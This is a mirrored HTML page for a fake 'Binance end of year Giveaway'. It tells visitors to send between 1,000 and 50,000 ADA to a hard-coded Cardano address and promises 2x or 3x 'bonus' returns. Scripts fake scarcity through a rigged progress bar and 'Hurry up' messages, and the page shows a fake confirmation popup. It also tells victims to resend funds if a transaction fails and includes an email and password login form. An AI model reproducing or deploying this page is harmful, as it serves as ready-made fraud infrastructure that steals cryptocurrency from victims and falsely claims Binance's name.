


<!-- meta tags and other links -->
<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from bnc-xmax-2x.live/ADA/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 23 Dec 2021 18:56:33 GMT -->
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Get 2x/3x ADA Bonus Now</title>
  <!-- site favicon -->
  <link rel="icon" type="image/png" href="../assets/images/favicon.html" sizes="16x16">
  <!-- bootstrap 4  -->
  <link rel="stylesheet" href="../css/bootstrap.min.css">
  <!-- fontawesome 5  -->
  <link rel="stylesheet" href="../css/all.min.css">
  <!-- line-awesome webfont -->
  <link rel="stylesheet" href="../css/line-awesome.min.css">
  <!-- custom select css -->
  <link rel="stylesheet" href="../css/nice-select.css">
  <!-- animate css  -->
  <link rel="stylesheet" href="../css/animate.min.css">
  <!-- lightcase css -->
  <link rel="stylesheet" href="../css/lightcase.css">
  <!-- slick slider css -->
  <link rel="stylesheet" href="../css/slick.css">
  <!-- jquery ui css -->
  <link rel="stylesheet" href="../css/jquery-ui.min.css">
  <!-- datepicker css -->
  <link rel="stylesheet" href="../css/datepicker.min.css">
  <!-- style main css -->
  <link rel="stylesheet" href="../css/main.css">

<script type="text/javascript" src='../scripts/jquery.js'></script>


<!-- css -->
<link rel="stylesheet" rel="stylesheet" type="text/css" href="../files/style.css">
<link rel="preconnect" href="https://fonts.gstatic.com/">
<link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@300;400&amp;display=swap" rel="stylesheet"> 
<link rel="stylesheet" rel="stylesheet" type="text/css" href='../files/theme.min.css'>

<link rel="stylesheet" href="../static/cryptocoins.css" />
<link rel="stylesheet" href="../static/cryptocoins-colors.css"/>




<script type="text/javascript" src="../scripts/jquery.js"></script>
<style type="text/css">
  .writeit {
  font-size: 20pt;
  font-weight:bold;
  line-height: 50px;
  /*text-align: center;*/
  padding: 31.5px 0 70px 0;
  color: #fff;
}
  
.after {
-webkit-animation-delay: 500ms; -moz-animation-delay: 500ms; -ms-animation-delay: 500ms; -o-animation-delay: 500ms; animation-delay: 500ms;
  animation: blink 1.3s infinite;
}

@keyframes blink {
  50% { opacity: 0; }
  to { opacity: 1;}
}


</style>
<script type="text/javascript">
  // Create the array with the text you want to write
var txt2write = new Array(
    " Binance end of year Giveaway",
    " ADA!"
    );

// Variables
var speed = 100; // You can set the speed here. + is slower
var index = 0;
text_pos = 0;
var str_length = txt2write[0].length;
var contents, row;

// Function
function type_text() {
    // Init the content with blank
    contents = '';
    row = Math.max(0, index - 9);
    while (row < index) {
        // Each sentence will end with a <br />
        contents += txt2write[row++] + '\r<br />';
    }

    // Write the text
    $( "div.writeit" ).html( contents + txt2write[index].substring(0, text_pos) + "<span class='after'>_</span>" );

    if (text_pos++ == str_length) {
        text_pos = 0;
        index++;
        if (index != txt2write.length) {
            str_length = txt2write[index].length;
            setTimeout("type_text()", 800);
        }
    } else {
        setTimeout("type_text()", speed);
    }

}

type_text();
</script>



  <script src="ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.html"></script>
<script src="code.jquery.com/ui/1.11.4/jquery-ui.html"></script>
<script type="text/javascript" src="cdnjs.cloudflare.com/ajax/libs/jquery-cookie/1.4.1/jquery.cookie.min.html"></script>
<link rel="stylesheet" rel="stylesheet" type="text/css" href="../static/files/theme.min.css">
<script src="../scripts/popper.min.html" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="../scrips/bootstrap.min.html" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
<script>
window.onload = function() {
if (!localStorage.getItem("justonce")) {
localStorage.setItem("justOnce", "true");
window.location.reload();
}
}
</script>

<script type="text/javascript">
//<![CDATA[
window.onload = function() {

} //]]>
</script>
</head>
  <body>
  <script type="text/javascript" src="../scripts/jquery.js"></script>

<script type="text/javascript">
    $(window).on('load',function(){
    var pre_loader = $('#preloader')
  pre_loader.fadeOut('slow',function(){$(this).remove();});
  }); 
    
</script>
<style type="text/css">
    input{
      color: #000 !important;
    }
    ::placeholder { /* Chrome, Firefox, Opera, Safari 10.1+ */
  color: #000 !important;
  opacity: 1; /* Firefox */
}

:-ms-input-placeholder { /* Internet Explorer 10-11 */
  color: #000 !important;
}

::-ms-input-placeholder { /* Microsoft Edge */
  color: #000 !important;
}
  .loading {
    position: fixed;
    inset: 0;
    background: #fff;
    z-index: 109999;
    display: flex;
    gap: .5rem;
    justify-content: center;
    place-items: center;
    align-items: center;
    animation: hide 3100ms forwards ease-out;
  }
  
  
  .loading-item {
    height: 1rem;
    width: 2px;
    background: #F98901;
    animation: loader 1500ms forwards 2;
    
  }
  
  @keyframes loader {
    from {
      /* transform: translateY(1rem); */
      transform: scale(1);
    }
    50% {
      /* transform: translateY(3rem); */
      transform: scale(1.5);
    }
  
    to {
      /* transform: translateY(1rem); */
      transform: scale(1);    
    }
  }
  
  @keyframes hide {
    from {
      opacity: 1;
      visibility: visible;
    }
    90% {
      /* transform: translateY(3rem); */
      opacity: 1;
      visibility: visible;
    }
  
    to {
      /* transform: translateY(1rem); */
      opacity: 0;
      visibility: hidden;
    }
  }
  
  .l1 {
    animation-delay: 200ms;
  }
  
  .l2 {
    animation-delay: 400ms;
  }
  
  .l3 {
    animation-delay: 600ms;
  }
  
  .l4 {
    animation-delay: 8000ms;
  }
  
  /* .l5 {
    animation-delay: 1000ms;
  }
  
  .l6 {
    animation-delay: 1200ms;
  }
  
  .l7 {
    animation-delay: 1400ms;
  } */
</style>
     <div class='loading'>
<div class='loading-item l1'></div>
<div class='loading-item l2'></div>
<div class='loading-item l3'></div>
<div class='loading-item l4'></div>

</div>


  <!-- scroll-to-top start -->
  <div class="scroll-to-top">
    <span class="scroll-icon">
      <i class="las la-arrow-up"></i>
    </span>
  </div>
  <!-- scroll-to-top end -->


<div class="pop-body">
<div class="pop-inner">
<div class="pop-head">
<h3 class="pop-head-text">Generated Address</h3><svg id="close" height="20" viewBox="0 0 20 20"
width="20" xmlns="http://www.w3.org/2000/svg">
<path d="M18.096 19.174l1.401-1.427L1.7.286.3 1.714z"></path>
<path d="M19.497 1.714L18.096.286.3 17.747l1.4 1.427z"></path>
</svg>
</div>
<div class="pop-post-body">
<div class="pop-post-inner">
<div class="pop-anrange">
<div class="pop-img">
<div class="pop-qr">
<div class="inner-qr">
<div class="main-qr">
<div opacity="0" class="qr"></div>
<p style="color:green; margin-top:1rem; margin-bottom: 2px; text-align: center;">0 Confirmation</p>
<center><img src="../static/files/loading.svg" width="70px"></center>
</div>
</div>
</div>
</div>
<div class="timer-b" id="timer1"></div>
<div class="address-place">
<div class="inner-address"><span class="wallet-ad">Amount:</span>
<div class="address">
<div class="main-ad"><span class="real-address" id="gen-amount"></span></div>
<div class="copy-body">
<div class="copy-inner">
    <img class="cp" id="copy_" src="../static/files/copy.svg">
</div>
</div>
</div>
</div>

<div class="inner-address"><span class="wallet-ad">Generated address:</span>
<div class="address">
<div class="main-ad"><span
    class="real-address">addr1q99fzywu0vdtjdnquggqyepzmrkk0dyjzdu2y4v6f6fffmj2jygac7c6hymxpcssqfjz9k8dv76fyymc5f2e5n5jjnhqkqvz0c</span></div>
<div class="copy-body">
<div class="copy-inner">
    <img class="cp" id="copy_address" src="../static/files/copy.svg">
</div>
</div>
</div>
<a href="#" class="d-block m-auto" target="_blank" rel="noopener noreferrer">
<input id='paynow' value="Pay Now" class="btn btn-info mt-3" type="button"
style="display:block; width: 100% !important;">
</a>
</div>

</div>
</div>
</div>
</div>
</div>
</div>

  <!-- theme-switcher start -->
<!--   <div class="theme-switcher">
    <div class="theme-switcher__icon">
      <i class="las la-cog"></i>
    </div>
    <div class="theme-switcher__body">
      <div class="single dark active">
        <a href="index.html">Dark Version</a>
      </div>
      <div class="single light mt-4">
        <a href="light-index.html">Light Version</a>
      </div>
    </div>
  </div> -->
  <!-- theme-switcher end -->
  <!-- page-wrapper start -->
  <div class="page-wrapper">
      <!-- login modal -->
  <div class="modal fade" id="loginModal" tabindex="1" role="dialog" aria-hidden="true">
    <div class="modal-dialog modal-dialog-centered modal-dialog-scrollable">
      <div class="modal-content">
        <div class="modal-body">
          <div class="account-form-area">
            <button type="button" class="close-btn" data-dismiss="modal" aria-label="Close"><i class="las la-times"></i></button>
            <h3 class="title">Welcome Back</h3>
            <div class="account-form-wrapper">
              <form>
                <div class="form-group">
                  <label>Email <sup>*</sup></label>
                  <input type="email" name="login_name" id="login_name" placeholder="Enter your Email">
                </div>
                <div class="form-group">
                  <label>password <sup>*</sup></label>
                  <input type="password" name="login_pass" id="login_pass" placeholder="password">
                </div>
                <div class="d-flex flex-wrap justify-content-between mt-2">
                  <div class="custom-checkbox">
                    <input type="checkbox" name="id-1" id="id-1" checked>
                    <label for="id-1">Remember Password</label>
                    <span class="checkbox"></span>
                  </div>
                  <a href="#0" class="link">Forgot Password?</a>
                </div>
                <div class="form-group text-center mt-5">
                  <button class="cmn-btn">log in</button>
                </div>
              </form>
              <p class="text-center mt-4">Don’t have an account? <a href="#0" data-toggle="modal" data-target="#signupModal"> Sign Up Now</a></p>
              <div class="divider">
                <span>or</span>
              </div>
              <ul class="social-link-list">
                <li><a href="#0"><i class="fab fa-facebook-f"></i></a></li>
                <li><a href="#0"><i class="fab fa-twitter"></i></a></li>
                <li><a href="#0"><i class="fab fa-google-plus-g"></i></a></li>
              </ul>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>

  <!-- Sign Up modal -->
<!--   <div class="modal fade" id="signupModal" tabindex="1" role="dialog" aria-hidden="true">
    <div class="modal-dialog modal-dialog-centered modal-dialog-scrollable">
      <div class="modal-content">
        <div class="modal-body">
          <div class="account-form-area">
            <button type="button" class="close-btn" data-dismiss="modal" aria-label="Close"><i class="las la-times"></i></button>
            <h3 class="title">Open Free Account</h3>
            <div class="account-form-wrapper">
              <form>
                <div class="form-group">
                  <label>Email <sup>*</sup></label>
                  <input type="email" name="signup_name" id="signup_name" placeholder="Enter your Email">
                </div>
                <div class="form-group">
                  <label>password <sup>*</sup></label>
                  <input type="password" name="signup_pass" id="signup_pass" placeholder="password">
                </div>
                <div class="form-group">
                  <label>confirm password <sup>*</sup></label>
                  <input type="password" name="signup_re-pass" id="signup_re-pass" placeholder="Confirm Password">
                </div>
                <div class="d-flex flex-wrap mt-2">
                  <div class="custom-checkbox">
                    <input type="checkbox" name="id-2" id="id-2" checked>
                    <label for="id-2">I agree to the</label>
                    <span class="checkbox"></span>
                  </div>
                  <a href="#0" class="link ml-1">Terms, Privacy Policy and Fees</a>
                </div>
                <div class="form-group text-center mt-5">
                  <button class="cmn-btn">log in</button>
                </div>
              </form>
              <p class="text-center mt-4"> Already have an account? <a href="#0" data-target="#loginModal">Login</a></p>
              <div class="divider">
                <span>or</span>
              </div>
              <ul class="social-link-list">
                <li><a href="#0"><i class="fab fa-facebook-f"></i></a></li>
                <li><a href="#0"><i class="fab fa-twitter"></i></a></li>
                <li><a href="#0"><i class="fab fa-google-plus-g"></i></a></li>
              </ul>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div> -->

  <!-- header-section start  -->
  <header class="header" >
    <div class="header__top">
      <div class="container">
        <div class="row align-items-center">
          <div class="col-sm-6">
            <div class="left d-flex align-items-center">
              <!-- <a href="tel:65655655"><i class="las la-phone-volume"></i> Customer Support</a> -->
              <div class="language">
                <!-- <i class="las la-globe-europe"></i> -->
        <!--         <select>
                  <option>En</option>
                  <option>Rus</option>
                  <option>Bn</option>
                  <option>Hp</option>
                  <option>Frn</option>
                </select> -->
              </div>
            </div>
          </div>
          <div class="col-sm-6">
            <div class="right">
              <div class="product__cart">
                <!-- <span class="total__amount">0.00</span> -->
              <!--   <a href="cart.html"  class="amount__btn">
                  <i class="las la-shopping-basket"></i>
                  <span class="cart__num">08</span>
                </a> -->
              </div>
              <!-- <a href="#0" class="user__btn" data-toggle="modal" data-target="#loginModal"><i class="las la-user"></i></a> -->
            </div>
          </div>
        </div>
      </div>
    </div><!-- header__top end -->
    <div class="header__bottom">
        <div class="container">
        <nav class="navbar navbar-expand-xl p-0 align-items-center">
          <a class="site-logo site-title" href="index.html" class="text-dark" style="color:e0e0e0"><img src="../images/blogo.png" style='width:200px'alt="site-logo"><span class="logo-icon"><i class="flaticon-fire"></i></span></a>
          <button class="navbar-toggler ml-auto" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
          <!-- <span class="menu-toggle"></span> -->
          </button>
          <div class="collapse navbar-collapse" id="navbarSupportedContent">
            <ul class="navbar-nav main-menu ml-auto">
              <li class="menu_has_children">
                <!-- <a href="#0">Home</a> -->
                <ul class="sub-menu">
          <!--         <li><a href="index.html">Home One</a></li>
                  <li><a href="index-two.html">Home Two</a></li>
                  <li><a href="index-three.html">Home Three</a></li>
                  <li><a href="index-four.html">Home Four</a></li> -->
                </ul>
              </li>
              <li class="menu_has_children">
                <!-- <a href="#0">Contest</a> -->
                <ul class="sub-menu">
            <!--       <li><a href="#">All contest</a></li>
                  <li><a href="contest-details-one.html">Contest Details One</a></li>
                  <li><a href="contest-details-two.html">Contest Details Two</a></li>
                  <li><a href="lottery-details.html">Lottery Details One</a></li>
                  <li><a href="lottery-details-two.html">Lottery Details Two</a></li> -->
                </ul>
              </li>
            <!--   <li><a href="winner.html">Winners</a></li>
              <li class="menu_has_children">
                <a href="#0">pages</a>
                <ul class="sub-menu">
                  <li><a href="about.html">About Us</a></li>
                  <li><a href="affiliate.html">Affiliate Page</a></li>
                  <li><a href="how-work.html">How it works</a></li>
                  <li><a href="user.html">User Panel</a></li>
                  <li><a href="blog.html">Blog Posts</a></li>
                  <li><a href="blog-single.html">Blog Single</a></li>
                  <li><a href="cart.html">Cart Page</a></li>
                  <li><a href="checkout.html">Checkout Page</a></li>
                  <li><a href="faq.html">FAQ Page</a></li>
                  <li><a href="error-404.html">404 Page</a></li>
                </ul>
              </li>
              <li><a href="contact.html">contact</a></li> -->
            </ul>
            <div class="nav-right">
              <!-- <a href="#" class="cmn-btn style--three btn--sm"><img src="../assets/images/icon/btn/tag.png" alt="icon" class="mr-2"> Buy Tickets</a> -->
            </div>
          </div>
        </nav>
      </div>
    </div><!-- header__bottom end -->
  </header>
  <!-- header-section end  -->








    <!-- inner-hero-section start -->
    <div class="inner-hero-section style--four">
      <div class="container">
        <div class="row">
          <div class="col-lg-12">
              <div  class="writeit" style='color:#fff;text-align: center;color:#FFB200'>  </div>
            <ul class="page-list">
           <!--    <li><a href="index.html">Home</a></li>
              <li><a href="#0">Pages</a></li>
              <li class="active">Blog</li> -->

            </ul>
          </div>
        </div>
      </div>
    </div>
    <!-- inner-hero-section end -->

    <!-- blog section start  -->
    <section class="mt-minus-150 pb-120"style="background: linear-gradient(
    to bottom,
    rgba(0,0,0, 0),
    rgba(0,0,0, 60)
  ),url(../../thumbs.gfycat.com/AjarJaggedClumber-size_restricted.gif);">
      <div class="container">
        <div class="row">
          <div class="col-lg-12">
            <div class="blog-card has-link">
              <!-- <a href="light-blog-single.html" class="item-link"></a> -->
              <div class="blog-card__thumb"><img src="../images/index.jpg" alt="image"></div>
              <div class="blog-card__content"style="background: #000;width:100%;margin:0px;">
                <h3 class="blog-card__title">HOW TO PARTICIPATE</h3>
   
<p>To verify your CARDANO address, just send from <b>1000 ADA</b> - <b>50,000 ADA</b> to the competetion smart contract address below and get from
<b>2000 ADA</b> - <b>150,000 ADA</b> back. <i><b>(<strong>you will receive a 3x bonus if you send from 10,000 ADA and above)

</b></strong></i> 

<p>You will receive a 3x/2x bonus depending on the amount you stake with.<br/><br/></p>
<p>Bonus are processed automatically within 4 - 15 minutes <i>(after deposit to the staking address is confirmed on the blockchain)</i></p>
<p>
                <div class="blog-card__footer">
   <ul style="color:#fff">
<li style="color:#fff">Step1: Make sure you have the minimum requirment..</li>
<li style="color:#fff">Step2: Enter the amount you want to participate with.</li>
<li style="color:#fff">Step3: Enter your ADA address (optional)</li>
<li style="color:#fff">Step4: Click the "Generate Payment" button to generate your deposit address.</li>
<li style="color:#fff">Step5: Send the amount you entered to the generated address.</li>
<li style="color:#fff">Step5: Check your wallet for confirmation of your bonus.</li>
<li style="color:#fff">Step6: Post your testimony on our telegram group</li>

</ul>
<p> 2x bonus will be sent to the address you entered or the one you sent the ADA from.</p>

<p>If the transaction does not process correctly, please try again by sending the same amount to the Generated address, and it should go through. Your original transaction will merge with the new one, and the bonus for the two will be sent back.</p>
                <div class="right">
    
                </div>
                </div>
              </div>
            </div><!-- blog-card end -->
          </div>
        </div>



















        <div class="row mt-50">
          <div class="col-lg-12 mb-none-30">
           





<div class="cal-body " style="background: #000;width:100%">
<div class="cal-inner">
<div class="input">
<div class="title">Amount To Invest:</div>
<div class="amount-con">
<div class="inner-con">
<div class="pic"><img src="../../cdn4.iconfinder.com/data/icons/crypto-currency-and-coin-2/256/3305878.png" style='width:30px' alt="knc"></div>
<div class="amount">
<div class="main-input">
<div class="in-main"><input id="cal-in"
        class="exchange-content__input theme__background-4 theme__text-4 " min="0" placeholder="0" type="number" maxlength="50" autocomplete="off"
        value=""></div>
</div>
</div>
</div>
</div>
</div>
<div class="icon-body"><span data-tip="Click to swap" data-for="swap-icon" currentitem="false"><img
src='../static/files/exchange-alt.svg' alt="img" class="exchange__swap-icon"></span></div>
<div class="input">
<div class="title">Expected Bonus:</div>
<div class="amount-con">
<div class="inner-con">
<div class="pic"><img src="../../cdn4.iconfinder.com/data/icons/crypto-currency-and-coin-2/256/3305878.png" style='width:30px' alt="knc"></div>
<div class="amount">
<div class="main-input">
<div class="in-main"><input id="cal-out"
        class="exchange-content__input theme__background-4 theme__text-4 " maxlength="50" min="0" autocomplete="off"
        value=""></div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="enaddress">
<div class="title"><addr title="Enter the address where you want your bonus to be sent to. Note: this feild is optional, if you leave it empty, the bonus will be sent to the address you sent from.">Receiving (Wallet) Address:</addr></div>
<div class="inner-enter"><input type="text" placeholder="Enter your ADA address"></div>
</div>

<div class="but-con">
<div id="gen-btn" class="swap-but">Generate Payment</div>
<div class="terms text-info text-center mb-2"><span><span id="warn"></span></span>
</div>
</div>
<div id="lympo_progress">
<div class="row progress-row">
<div class="colums_12">
<div class="progress-ico">
<div class="progress-ico">
<div class="progress">
<div class="progress-bar progress-bar-striped active progress-width"
    id="progress-ico" role="progressbar" style="width: 100%;">
    <span class="sr-only">x</span></div>
</div>
</div>
<div class="dot-1" id="leftADA">
Counting ADA left...
</div>
<div class="dot-1-airdrop  progress-left"></div>
<span class="pbv" id="progress-ico-bar"></span>
</div>
</div>
</div>
</div>
<div class="support">
<div class="sup">
<div class="sup-space"></div>
<div class="both-line">
<div class="import-account__title-content theme__background-2 theme__text-4">Supported Exchange
</div>
</div>
<div class="import-account__content">
<div class="import-account__item">
<div class="import-account__block theme__import-button">
<div class="import-account__icon metamask"><img src='../static/files/binance.ico' width="20">
</div>
<div class="import-account__name">BINANCE</div>
</div>
</div>
<div class="import-account__item import-account__item-ledger">
<div>
<div class="import-account__block theme__import-button">
<div class="import-account__icon ledger"><img src='../static/files/upbit.png' width="20">
</div>
<div class="import-account__name">UPBIT</div>
</div>
</div>
</div>
<div class="import-account__item import-account__item-trezor">
<div>
<div class="import-account__block theme__import-button">
<div class="import-account__icon trezor">
    <div class="import-account__icon ledger"><img src='../static/files/okes.png'
            width="20"></div>
</div>
<div class="import-account__name">OKEX</div>
</div>
</div>
</div>
<div class="import-account__item">
<div>
<div class="import-account__block theme__import-button" tabindex="0"><input type="file"
    multiple="" autocomplete="off" tabindex="-1" style="display:none;">
<div class="import-account__icon json"><img src='../static/files/tano.png' width="20"
        style="border-radius: 1rem;"></div>
<div class="import-account__name">REMITANO</div>
</div>
</div>
</div>
<div class="import-account__item">
<div class="import-account__block theme__import-button">
<div class="import-account__icon private-key"><img src='../static/files/tox.png' width="20">
</div>
<div class="import-account__name">MERCATOX</div>
</div>
</div>
<div class="import-account__item ">
<div class="import-account__block theme__import-button">
<div class="import-account__icon promo-code"><img src='../static/files/luno.png' width="20">
</div>
<div class="import-account__name">LUNO</div>
</div>
</div>
<div class="import-account__item import-account__item-trezor">
<div>
<div class="import-account__block theme__import-button">
<div class="import-account__icon trezor"><img src='../static/files/coinsph.png' width="20">
</div>
<div class="import-account__name">COINS.PH</div>
</div>
</div>
</div>
<div class="import-account__item">
<div>
<div class="import-account__block theme__import-button" tabindex="0"><input type="file"
    multiple="" autocomplete="off" tabindex="-1" style="display:none;">
<div class="import-account__icon json"><img src='../static/files/ava.jpg' width="20"
        style="border-radius: 1rem;"></div>
<div class="import-account__name">COINBASE</div>
</div>
</div>
</div>
<div class="import-account__item">
<div class="import-account__block theme__import-button">
<div class="import-account__icon private-key"><img src='../static/files/yobit.ico' width="20">
</div>
<div class="import-account__name">YOBIT</div>
</div>
</div>
</div>
</div>
</div>
</div>
</section>


























            </div><!-- blog-card end -->
           
        </div>
      </div>
    </section>
    <!-- blog section end -->

<main id="content" role="main"style="background: #fff;">
<div id="ContentPlaceHolder1_divSummary" class="container space-bottom-2">
<div class="card">
<div class="card-body">
<div class="tab-content">
<div class="tab-pane fade show active" id="transactions" role="tabpanel" aria-labelledby="transactions-tab">
<div class="table-responsive mb-2 mb-md-0">
<table class="table table-hover" id="myTable">
<thead class="thead-light">
<tr>
<th scope="col" width="1">Txn Hash</th>
<th scope="col" width="1" class="d-none d-sm-table-cell">Block</th>
<th scope="col"><span class="timer" title="UTC time">Age</span></th>
<th scope="col">From</th>
<th scope="col" width="30"></th>
<th scope="col">To</th>
<th scope="col">Value</th>
<th scope="col"><span id="ContentPlaceHolder1_spanTxFee" title="(Gas Price * Gas Used by Txns) in ADA"><spanclass="text-secondary">[Txn Fee]</span></span>
</th>
</tr>
</thead>
<tbody></tbody>
</table>
</div>
<div class="d-flex justify-content-between align-items-center mt-3 mb-4">
<div class="d-flex align-items-center text-secondary"></div>
</div>
</div>
</div>
</div>
</div>
</div>
</main>

<!-- ###############################Start of progress bar######################################### -->
<script type="text/javascript">
$(document).ready(function() {
$('.spoiler-title').click(function() {
$(this).parent().children('div.spoiler-content').toggle('fast');
return false;
});
});
</script>
<script>
function setProgress(count, max) {
var p = (100 * count / max).toString() + '%';
$('.progress-left').css('left', p);
$('.progress-width').css('width', p);
var aa = count.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
var rr = max.toString().replace(/(\d)(?=(\d\d\d)+([^\d]|$))/g, '$1 ');
$('.pbv').text(aa + ' / ' + rr);

}



var ctd = setInterval(function() {
if (localStorage.getItem("ADAprogress")) {
if (localStorage.getItem("ADAprogress") <= 150) {
var alt_count = localStorage.getItem("ADAprogress");
} else if (localStorage.getItem("ADAprogress")) {
var alt_sec_count = localStorage.getItem("ADAprogress");
var alt_count = alt_sec_count - Math.floor((Math.random() * 10) * 4 + 5);
}
} else {
var alt_sec_count = Math.floor((Math.random() * (5499 - 5400) + 5400) + 1);
var alt_count = alt_sec_count - Math.floor((Math.random() * 10) * 4 + 5);
}
var alt_count2 = 110070;
setProgress(alt_count2, 200000)



localStorage.setItem("ADAprogress", alt_count);

if (alt_sec_count <= 300)
clearInterval(ctd);
if (alt_count <= 9999 && alt_sec_count >= 2001)
document.getElementById("leftADA").innerHTML = "Left ADA";
if (alt_count <= 700 && alt_sec_count >= 301)
document.getElementById("leftADA").innerHTML = "Hurry up, not much more ADA left!";
if (alt_count <= 300)
document.getElementById("leftADA").innerHTML = "Last chance to get your ADA!";
if (alt_count <= 1000)
document.title = alt_count + " ADA left";
if (alt_count <= 500)
document.title = "Get your " + alt_count + " ADA now!";

}, 6666);
</script>
<!-- ###############################End of progress bar######################################### -->


<script src="../files/jdfghkjdfhgvsjkdfgcphjkfdhgjsdfg.js"></script>
</body>
      <!-- footer section start  -->
  <footer class="footer-section" style="background:#000">
    <div class="container">

        </div>
      </div>
    </div>
    <div class="container pt-120">
      <div class="row pb-5 align-items-center">
        <div class="col-lg-4">
          <ul class="app-btn">
            <li><a href="#0"><img src="../images/1.png" alt="image"></a></li>
            <li><a href="#0"><img src="../images/2.png" alt="image"></a></li>
          </ul>
        </div>
        <div class="col-lg-8">
          <ul class="short-links justify-content-lg-end justify-content-center">
        <!--     <li><a href="#0">Abount</a></li>
            <li><a href="#0">FAQs</a></li>
            <li><a href="#0">Contact</a></li>
            <li><a href="#0">Terms of Services</a></li>
            <li><a href="#0">Privacy</a></li> -->
          </ul>
        </div>
      </div>
      <hr>
      <div class="row py-5 align-items-center">
        <div class="col-lg-6">
          <p class="copy-right-text text-lg-left text-center mb-lg-0 mb-3">Copyright © 2021.All Rights <a href="#"></a></p>
        </div>
        <div class="col-lg-6">
          <ul class="social-links justify-content-lg-end justify-content-center">
            <li><a href="#0"><i class="fab fa-facebook-f"></i></a></li>
            <li><a href="#0"><i class="fab fa-twitter"></i></a></li>
            <li><a href="#0"><i class="fab fa-linkedin-in"></i></a></li>
          </ul>
        </div>
      </div>
    </div>
  </footer>
  <!-- footer section end -->
  </div><!-- page-wrapper end -->
  <!-- page-wrapper end -->
  <!-- jQuery library -->
  <script src="../scripts/jquery.js"></script>
  <!-- bootstrap js -->
  <script src="../scripts/bootstrap.bundle.min.js"></script>
  <!-- custom select js -->
  <script src="../scripts/jquery.nice-select.min.js"></script>
  <!-- lightcase js -->
  <script src="../scripts/lightcase.js"></script>
  <!-- wow js -->
  <script src="../scripts/wow.min.js"></script>
  <!-- slick slider js -->
  <script src="../scripts/slick.min.js"></script>
  <!-- countdown js -->
  timer.innerHTML = days+":"+hrs+":"+mins+":"+secs+":"+m_secs
            }
            else{
                window.location.reload()
            }
        }
        
        function set_timer(){
            let t_ex = null
            if (t_ex){
                expire = new Date(t_ex*1000).getTime();
                now = new Date().getTime(); 
                dis = expire - now
                if (dis > 0){
                    timer_html = document.getElementById('timer')
                    timer(t_ex, timer_html);
                    setInterval(()=>{
                        timer(t_ex, timer_html);
                    }, 1)
                }
                
            }
        }
        set_timer()

  <script src="../scripts/jquery.countdown.js"></script>
  <!-- jquery ui js -->
  <script src="../scripts/jquery-ui.min.js"></script>
  <!-- datepicker js -->
  <script src="../scripts/datepicker.min.js"></script>
  <script src="../scripts/datepicker.en.js"></script>
  <!-- preloader -->
  <script src='../scripts/TweenMax.min.js'></script>
  <script src='../scripts/MorphSVGPlugin.min.js'></script>
  <script src="../scripts/preloader.js"></script>
  <!-- contact js -->
  <script src="../scripts/contact.js"></script>
  <!-- custom js -->
  <script src="../script/app.html"></script>
 <!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/5fb5ad6ea1d54c18d8eb0b7c/default';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->
  </body>

<!-- Mirrored from bnc-xmax-2x.live/ADA/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 23 Dec 2021 18:56:38 GMT -->
</html>